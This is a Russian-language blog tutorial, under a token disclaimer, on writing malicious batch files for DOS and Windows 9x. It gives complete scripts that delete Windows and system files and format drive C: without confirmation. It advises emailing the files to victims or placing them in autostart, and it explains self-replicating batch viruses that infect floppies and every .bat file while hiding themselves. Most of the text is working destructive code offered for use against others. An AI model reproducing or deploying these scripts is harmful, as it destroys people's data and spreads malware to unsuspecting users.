Так, что же могут сделать эти маленькие bat файлы и как их сделать. Для
тех кто хоть капельку имеет представление о ДОСовских командах будет
все проще. Я же со своей стороны постараюсь объяснить каждую строчку. ПРАВИЛА
1.Вы
не должны использовать материалы для получения доступа к закрытым
ресурсам, взлома почтовых ящиков, систем управления счетами, сайтов,
управления чужими компьютерами. Вы обязуетесь не создавать вредоносных
программ, тем более глобального масштаба и способных принести ощутимый
вред. Читая разделы сайта, Вы соглашаетесь с данными требованиями. В
противном случае - закройте данную страницу.
Начнём.
2.ВНИМАНИЕ!
Данная статья представлена только для ознакомления. Автор и
администрация блога не несут отвественности за противоправные действия,
испорченное оборудование или иные негативные последствия.
Для написания нам понадобится обыкновенный блокнот.
1. пишем любое название блокнота(install.bat), главное чтобы Вы поставили расширение *.bat.
2. запускаем блокнот.
3. Теперь пишим в нем команды которые батик будет выполнять на чужом кампе, помните все команды он делает последовательно.
Грохаем windows на кампе жертвы:
Cd\ -команда для выхода в корневой каталог из места откуда был запущен bat файл
Cd C: -команда перехода на диск C где почти у всех кампах стоит виндовс
Сd windows -переходим в папку Windows (у 95% ламеров и юзеров папка называется именно так)
Большой минус бат файлов да и ДОСа в частности это то что нельзя
удалять сразу папку с файлами, а нужно заходить в каждую папку отдельно
и удалять там файлы.!!!
del *.exe -удаяем все файлы с расширением .exe
del *.ini -удаяем все файлы с расширением .ini
del *.com -удаяем все файлы с расширением .com
cd\
cd windows
cd system
del *.dll
del *.exe
После этих простеньких строчек у юзера или ламера будет примерно 30 минут работы!)
Код полностью:
Cd\
Cd C:
Сd windows
del *.exe
del *.ini
del *.com
cd\
cd windows
cd system
del *.dll
del *.exe
Но вдруг папка виндовс называется не windows а например winMe, или
win98, да без проблем, просто надо будет после этого кода написать ниже
ещё один только чтобы папка называлась winMe и так далее.
Cd\
Cd C:
Сd winMe
Del *.exe
Del *.ini
Del *.com
Cd\
Cd win98
Cd system
Del *.dll
Del *.exe
и так далее! Как вы понимаете таким образом можно грохнуть все что
угодно на чужом винте! Только помните, что такое можно делать если на
машине жертвы стоит Windows 9Х!!!
Люблю прикалывать ламеров, это форматирование диска С:\
Форматируем диск С:\
Cd\ -команда для выхода в корневой каталог из места откуда был запущен bat файл
Format C:\ -команда форматирования диска
С:\ Y -команда автоматического согласие форматирование диска без ведома или подтверждения команды ламером
Y -тоже самое
Y -уже говорил
Хе! Вот и все…
Код полностью:
Cd\
Format C:\
Y
Y
Y
Единственный минус! Такой код может не сработать если на кампе стоит
Windows ME или XP! Придется писать другой путь. В этих форточках
команда форматирования лежит не просто в папке Windows, а по следующему
пути
C:\WINDOWS\COMMAND\format c:
но само сабой форматироваться не будет, а потребует потверждение и простая команда
Y
Y
Y
не поможет, нужена другая. Просто добавим параметр /autotest
C:\WINDOWS\COMMAND\format c: /autotest
В данном случае, подтверждать ничего не придется.
Как и где это применить?
Просто отсылаете бат фаил какому нибудь юзверю по аське или на мыло.
При открытие файла, начнёца процесс.
Так что не советую открывать фаил у себя на компе.
Если Вы залезли на удаленный компьютер то можете тоже злостно пошутить.
Но как сделать так, чтобы файл запустился автоматически?
Лазив по компу жертвы Вам вдруг захотелось форматнуть его винт, ну мало
ли, вдруг он какой нибудь нацист или педофил! Разумеется Вы не сможите
запустить файл со своего компа на компе жертвы. Но всёже есть пару
вариантов. Первый, это загрузить файл в автозагрузку по пути
C:\windows (или как там будет папка называться)\Главное меню \
Программы \Автозагрузка или переименовать Ваш батик в Autoexec.bat и
загрузить в корневой С:\
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
ВТОРОЙ СПОСОБ
@Echo off
copy %0 c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
Этот вирус заражает винчестер, оставляя только один файл virus.bat.
Но все-таки я бы не сказал что это полноценный вирус, т.к. он лишен
возможности заражать другие компьютеры. Чтобы этот BAT-вирус обрел
более четкие очертания дополним его возможностью заражать другие ПК:
@Echo off
copy %0 c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
copy %0 a:run.bat >nul
В этом примере появляется строка, которая дает возможность вирусу
заражать дискеты. Смысл этого в том что если при перезагрузке ПК в
дисководе будет дискета, то она будет заражена.
Конечно файл virus.bat в корневом диске C: будет сильно мозолить
глаза юзеру, чтобы этого не было существует программа attrib.
Преобразуем вирус:
@Echo off
copy %0 c:virus.bat >nul
attrib +h c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
copy %0 a:run.bat >nul
Если вы внимательны, то вы уже поняли, что вызов файла virus.bat в
autoexec.bat будет записываться каждый раз при перезагрузке ПК.
Чтобы этого не произошло есть простой способ: после записи вызова
надо с помощью программы attrib установить атрибут только чтение у
autoexec.bat. А есть другой вариант, он немного посложнее, но
гораздо грамотнее:
@Echo off
if exist c:virus.bat goto cool
copy %0 c:virus.bat >nul
attrib +h c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
:cool
copy %0 a:run.bat >nul
Здесь вторая строка проверяет существует ли уже файл c:virus.bat и
если он уже существует, то происходит переход к метке cool. Этот
способ тоже очень прост. Явный недостаток - если юзер уберет вызов
из autoexec.bat, а файл virus.bat оставит, то глупый вирус будет
нагло обманут. Чтобы вирус был умнее, то надо использовать программу
find, если вам будет не лень с ней разбираться, то вы сможете
написать более сложный BAT-вирус, который будет заражать не один
файл c:autoexec.bat, а все *.BAT. Пример:
@echo off%[MeTrA]%
if '%1=='In_ goto MeTrAin
if exist c:MeTrA.bat goto MeTrAru
if not exist %0 goto MeTrAen
find "MeTrA"<%0>c:MeTrA.bat
attrib +h c:MeTrA.bat
:MeTrAru
for %%t in (*.bat) do call c:MeTrA In_ %%t
goto MeTrAen
:MeTrAin
find "MeTrA"<%2>nul
if not errorlevel 1 goto MeTrAen
type c:MeTrA.bat>>%2
:MeTrAen
Смысл заражения таков: в вирусе каждая строчка имеет метку, в данном
примере она MeTrA. Например, в первой строке эта метка ничего не
делает, во второй строке эта метка, как бы, не является пассивной,
она используется для внутренней работы вируса, а именно участвует в
названии метки. При запуске вирус проверяет, есть ли файл
C:METRA.BAT, если нет, то вирус создает его и с помощью программы
find копирует из файла (из которого стартовал) все строки содержащие
метку вируса, т.е. копирует только вирусные строки. Так, вирусные
строки скопированы. Значит в файле C:METRA.BAT теперь находится
копия вируса. Далее вирус ищет BAT-файлы. Чтобы не происходило
повторного заражения используется все таже программа find. Допустим
вирус нашел файл RUN.BAT и он оказался еще не заражен, тогда вирус
вызывает файл C:METRA.BAT с такими параметрами: In_ RUN.BAT, здесь
первый параметр In_ говорит вирусу, что надо заразить файл, имя
которого указано во-втором параметре, в данном случае он RUN.BAT.
Вирус в C:METRA.BAT заражает файл RUN.BAT простейшим способом - с
помощью команды type дописывает к файлу RUN.BAT себя. Вот так файл
RUN.BAT оказывается зараженным.
